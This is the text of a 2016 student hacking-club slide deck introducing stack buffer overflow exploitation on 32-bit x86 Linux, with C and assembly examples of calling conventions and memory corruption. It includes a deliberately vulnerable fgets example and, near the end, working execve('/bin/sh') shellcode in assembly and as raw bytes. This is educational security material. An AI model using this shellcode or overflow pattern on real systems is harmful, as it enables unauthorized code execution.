Intro to Binary Exploitation
Mark Mossberg
NU Hacks
Spring 2016
github.com/hacks/ibe2016
whoami
-
Senior computer engineering major
-
Low level enthusiast
-
CTF casual
-
Mostly with Shellphish
-
-
http://vmresu.me
Agenda
- Introduction
- Background Info
- Crash course in C, x86
- Stack buffer overflow
- Vulnerability
- Exploitation
- Workshop
Disclaimers
- All information provided in this presentation exists for educational purposes only.
- This is not "modern" exploitation.
- Much of the following is only relevant for x86 Linux.
What is Binary Exploitation?
Binary exploitation is the art of bending a computer program to your will
From https://picoctf.com/learn
What is Binary Exploitation?
- Binary: Executable file containing a computer program in the form of assembly instructions
- Exploitation: Taking advantage of a vulnerability in a computer program in order to cause unintended behavior (wikipedia)
Unintended behavior?
- Read: "Arbitrary Code Execution"
- Primary objective of exploitation
- "Code" == Processor Instructions
- Basically, take over their CPU and force it to do whatever we want.
- The code we execute is called the "payload"
High Level Challenges
- Hijack program's execution flow
- Perform arbitrary computation
C
- Created in the 1970's for writing UNIX
- Imperative, static typed, compiled
- "Low level", largely used for systems programming
- Widespread
- Operating Systems
- Embedded Systems
- Network Services
- Programming Languages 🐍
- Memory unsafe
For more extensive background, see http://github.com/rpisec/mbe
C Strings
- No "strings", just NULL-terminated char arrays
- "NULL-terminated" == ends with a '\0' char
- many libc APIs oriented around this
- String operations: strcpy(), strcat(), strlen(), etc
- I/O operations: read(), write(), fgets(), etc
- Bug prone :)
// this is not good C,
// just illustrating buffers
void hello(void) {
char message[10];
strcpy(message, "Hello\n");
printf("%s", message);
}
x86
- 32 bit CPU Architecture designed by Intel
- Defines a set of "instructions" available for programs to use. Low level operations like arithmetic, memory
- Defines set of "registers" for computation and state (think hardware variables)
- Important ones: esp (stack ptr), ebp (frame ptr), eip (instruction ptr)
-
Little endian
- In memory, numbers are stored LSB first
- Will be relevant when writing our exploit payload
C Compilation: Stack Variables
void myfunction(void) {
// local, stack variables.
int a = 1;
int b = 2;
int c = 3;
}
- Function local variables allocated in "stack" memory
-
Implemented by compiler as subtracting esp (stack ptr) register by space needed (in bytes)
- Stack grows down
080483cb <myfunction>:
80483cb: push ebp
80483cc: mov ebp,esp
80483ce: sub esp,0x10
80483d1: mov DWORD PTR [ebp-0x4],0x1
80483d8: mov DWORD PTR [ebp-0x8],0x2
80483df: mov DWORD PTR [ebp-0xc],0x3
80483e6: leave
80483e7: ret
C Compilation: Function Calls
void myfunction1(void) {
myfunction2(1, 2, 3);
}
void myfunction2(int a, int b, int c) {
a = 0xff; b = 0xff; c = 0xff;
}
080483cb <myfunction1>:
80483cb: push ebp
80483cc: mov ebp,esp
80483ce: sub esp,0x8
80483d1: sub esp,0x4
80483d4: push 0x3
80483d6: push 0x2
80483d8: push 0x1
80483da: call 80483e4 <myfunction2>
80483df: add esp,0x10
80483e2: leave
80483e3: ret
080483e4 <myfunction2>:
80483e4: push ebp
80483e5: mov ebp,esp
80483e7: mov DWORD PTR [ebp+0x8],0xff
80483ee: mov DWORD PTR [ebp+0xc],0xff
80483f5: mov DWORD PTR [ebp+0x10],0xff
80483fc: pop ebp
80483fd: ret
myfunc2
- "cdecl" calling convention
- Caller pushes arguments onto stack, execs call instruc.
- call pushes eip on stack, jumps to operand
- Callee sets up new frame with ebp/esp. At end of function, it restores stack, and execs ret
- ret pops stack into eip
- This is how functions know where to return to
C Compilation: Function Calls
void myfunction1(void) {
myfunction2(1, 2, 3);
}
void myfunction2(int a, int b, int c) {
a = 0xff; b = 0xff; c = 0xff;
}
080483cb <myfunction1>:
80483cb: push ebp
80483cc: mov ebp,esp
80483ce: sub esp,0x8
80483d1: sub esp,0x4
80483d4: push 0x3
80483d6: push 0x2
80483d8: push 0x1
80483da: call 80483e4 <myfunction2>
80483df: add esp,0x10
80483e2: leave
80483e3: ret
080483e4 <myfunction2>:
80483e4: push ebp
80483e5: mov ebp,esp
80483e7: mov DWORD PTR [ebp+0x8],0xff
80483ee: mov DWORD PTR [ebp+0xc],0xff
80483f5: mov DWORD PTR [ebp+0x10],0xff
80483fc: pop ebp
80483fd: ret
Takeaway: Program execution control data is stored on stack!
Memory Unsafety
- C does not stop you from trampling your own memory
- You crash if you're lucky
- Programmer's responsibility to ensure safety, not language's
-
Memory Corruption: when the contents of a memory location are unintentionally modified due to programming errors
- ex: Writing off the end of an array
Definition from https://en.m.wikipedia.org/wiki/Memory_corruption
void func(void) {
int arr[4];
for (int i = 0; i < 8; i++) {
arr[i] = 0xffffffff;
}
}
Corrupting Stack Memory!
Perfectly legit C though
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
Spot the bug
void func(void) {
// 15 byte string + NULL
char buf[16];
// read up to 165 bytes + NULL from stdin
fgets(buf, 166, stdin);
printf("Hello %s\n", buf);
}
what's dangerous about this code?
Spot the bug
void func(void) {
// 15 byte string + NULL
char buf[16];
// read up to 165 bytes + NULL from stdin
fgets(buf, 166, stdin);
printf("Hello %s\n", buf);
}
what's dangerous about this code?
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
🔥🔥🔥🔥
user can control 150 bytes after buf! (including return address!)
👈👈👈
Stack Buffer Overflows
- Result from bugs allowing more data written onto stack than space allocated for it
- Commonly seen in C string handling
- Dangerous, because program control info is stored on stack (ret addr) and could be corrupted
High Level Challenges
- ✅ Hijack program's execution flow
- Perform arbitrary computation
Exploitation
- Use buffer overflow to copy our payload onto the stack
- Corrupt the return address on the stack to point to it
- When function returns, our payload executes
Exploitation
High Level Challenges
- ✅ Hijack program's execution flow
- ✅ Perform arbitrary computation
Exploit Payload ("Shellcode")
- What code should we put on the stack?
- Code that executes a shell! (Gives us access to the system)
- Note: Payloads don't have to exec a shell to be called shellcode
- Traditionally written in assembly due to constraints
Exploit Payload ("Shellcode")
- How will our shellcode execute a shell?
- How does any program execute any other program?
-
execve()
System Calls
- System Call: The interface programs use for calling into the Operating System
- Programs do these to do anything related to the real world
- If we want our exploit payload to do anything, it will need to trigger a syscall
- "execve" is syscall used to execute other programs
- Triggered by architecture specific instructions
-
For x86, we'll use "int 0x80"
-
execve(char *filename, char *argv[], char *envp[]);
-
Arg 1: Path to file to execute
- "/bin/sh"
-
Arg 2: Array of program arguments
- {"/bin/sh", NULL}
- Arg 3: Array of environment vars
- NULL
-
Set syscall arguments in registers before triggering syscall instruction
- eax = syscall # (0xb)
- ebx = filename
- ecx = argv
- edx = envp
Writing Shellcode
- Write in C
- Hand compile to x86
- Assemble to machine code
char *args[] = {"/bin/sh", NULL};
execve(args[0], args, NULL);
; I didn't write this, I found it on the
; internet a while ago
xor eax,eax ; int eax = 0
push eax
push 0x68732f2f ; these three create "/bin//sh\0"
push 0x6e69622f ; on the stack
mov ebx,esp ; char *ebx = "/bin//sh";
push eax
push ebx
mov ecx,esp ; char *ecx = {"/bin//sh", 0};
mov edx,eax ; int edx = 0
mov al,0xb ; 0xb is syscall number for execve
int 0x80 ; trigger syscall
sc = ("\x31\xc0\x50\x68\x2f" +
"\x2f\x73\x68\x68\x2f" +
"\x62\x69\x6e\x89\xe3" +
"\x50\x53\x89\xe1\x89" +
"\xc2\xb0\x0b\xcd\x80")
Modern Defenses
- DEP/NX (Data Execution Prevention/No eXecute)
- Hardware support, disable executable stack
- ASLR (Address Space Layout Randomization)
- Randomizes address of stack variables
- Stack Cookies/Canaries
- Compiler inserts code to check integrity of stack before returning from functions
Local vs Remote Exploits
- Local Exploit: Exploiting a program running on the same machine
- Privilege Escalation
- Remote Exploit: Exploiting a program running on a different machine (over a network)
- Jailbreakmes
That was a lot! Lets pwn some stuff.
Questions?/Workshop
Intro to Binary Exploitation
By offlinemark
Intro to Binary Exploitation
NU Hacks talk, 3/31/16.
- 1,693